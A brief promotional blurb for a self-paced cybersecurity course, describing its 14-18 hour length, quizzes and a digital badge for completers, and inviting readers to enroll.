The self-paced course can be completed in about 14-18 hours and includes quizzes to test the knowledge gained. Upon completion, participants will receive a digital badge verifying that they have been successful in all required coursework and have learned the material. This digital badge can be added to resumes and social media profiles.
Enroll today to start improving your cybersecurity skills and practices!